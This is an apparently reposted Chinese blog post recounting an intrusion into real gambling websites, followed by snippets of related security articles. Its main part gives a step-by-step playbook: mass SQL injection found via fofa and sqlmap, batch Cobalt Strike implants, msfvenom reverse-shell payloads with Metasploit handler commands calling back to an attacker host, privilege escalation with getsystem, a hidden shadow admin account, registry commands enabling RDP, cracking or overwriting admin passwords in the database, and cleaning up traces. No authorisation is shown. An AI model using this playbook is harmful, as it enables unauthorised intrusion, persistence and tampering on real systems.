<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次對BC網站的滲透測試

    VSole2022-11-23 10:30:14

    0x01 信息搜集

    首先當然是通過fofa進行bc網站的后臺搜集(搜索語法大家自行探索),獲得的qi牌bc站幾乎都是一模一樣,估計是分站。隨便打開一個看看,是下圖

    sqlmap跑一把,發現存在堆疊注入。由于都是分站,因此存在相同漏洞的應該不少。

    0x02 上線cs

    寫個腳本,批量上線cs。可以看到有個上線就直接是SYSTEM權限,這就很無聊了。我們拿個普通權限的進行進一步滲透測試

    首先我們要提權,至少也得有Administrator權限吧。

    0x03 提權

    方式一(漏洞利用)

    cs中執行run systeminfo收集目標安裝的補丁,使用在線提權輔助工具查看能夠利用的漏洞。查找exp并利用即可。

    方式二(msf輔助提權)

    要想利用msf輔助提權,必須要反彈shell到msf

    一方面可以利用cs在目標機上執行msf生成的木馬上線msf。我這里是cs服務端和msf在同一vps上

    msfvenom -p windows/meterpreter_reverse_tcp lhost=x.x.x.x lport=8888 -f exe > shell.exe
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter_reverse_tcp
    show options
    set lhost x.x.x.x
    set lport 8888
    run
    

    將shell.exe上傳至目標并執行,即可看到msf已上線

    或者直接通過cs進行會話派生spawn

    cs上創建監聽器

    msf進行配置,注意這里兩個payload要相互對應

      use exploit/multi/handler
      
    set payload windows/meterpreter/reverse_http
      
    set lhost x.x.x.x
      
    set lport 8888
      
    exploit
      
    

    在msf中getuid查看到當前用戶為mssqlsserver,利用msf自帶的提權getsystem,居然直接就提權成功,拿到了system權限。

    然后再利用system權限執行cs生成的shell,上線之后就是system權限了

    當然我們獲得system權限后可以注入進程,更安全一些

    現在既然已經拿到了最高權限,那就可以為所欲為了。


    0x04 后滲透

    強烈建議創建一個影子管理員用戶,請自行百度。

    開啟RDP

    nmap掃一下發現3389端口未開

      查看是否開啟rdp
      
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
      
    如未打開,使用下列命令打開
      
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
      
    查看rdp端口
      
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
      
    

    這個管理員看來還是有點安全意識的,吧RDP端口改成了39982

    我們利用之前創建的影子用戶進行RDP連接,直接就進到了桌面。可以看到這就是個“正兒八經“的bc網站(doge)

    數據庫

    將mssql設置為windows登錄驗證,用影子用戶連上他們的數據庫看看

    在一個數據表中找到后臺登錄的用戶密碼,很幸運密碼直接就能用cmd5爆破出來。當然爆破不出來也沒事,直接把我們自己的密碼md5后直接修改數據表。

    登進后臺

    橫向移動

    這就是個小型的分站,并沒有加入域,單個的工作組,也就沒有進行下去的必要了

    打掃戰場

    沒有做持久化的必要了,走之前打掃一下戰場

    0x05 總結

    整個滲透過程(尤其是提權過程)都異常的順利,雖然通過輔助平臺查詢后發現有多個漏洞可以利用,但沒想到msf的getsystem直接就拿下了最高權限。

    滲透測試msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    系統安全第37篇普及Metasploit技術,希望您喜歡
    由于低權限用戶無法執行太多操作,可以利用反彈上傳Churrasco.exe,后續可以利用它來做提權。輸入net user指令查看是否添加成功,最后提權成功。linux系統提權思路linux基礎信息收集uname -a 顯示全部系統信息cat /etc/issue 內核信息。
    滲透測試輔助工具箱
    2023-05-12 14:08:08
    刪除記錄:刪除指定id主頁面MSF頁面正則表達式頁面小工具頁面0x03 免責聲明本工具僅能在取得足夠合法授權的企業安全建設中使用,在使用本工具過程中,您應確保自己所有行為符合當地的法律法規。該工具僅用于學習交流,如您在使用本工具的過程中存在任何非法行為,您將自行承擔所有后果,本工具所有開發者和本公眾號不承擔任何法律及連帶責任。
    免殺,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。
    0x01 前言由于最近某SRC開啟眾測福利,所以咱就跟著挖個洞,寫篇文章,一舉兩得。
    該篇章目的是重新牢固地基,加強每日訓練操作的筆記,在記錄地基筆記中會有很多跳躍性思維的操作和方式方法,望大家能共同加油學到東西。
    概述滲透測試的目標可以是單個主機,也可以是整個內網。在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。完整的內網滲透涉及的步驟如下圖所示。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。Step 1 信息收集完成邊界突破的第一步是目標對象資產的信息收集。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    滲透測試的目標可以是單個主機,也可以是整個內網。在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。完整的內網滲透涉及的步驟如下圖所示。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。Step 1 信息收集完成邊界突破的第一步是目標對象資產的信息收集。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类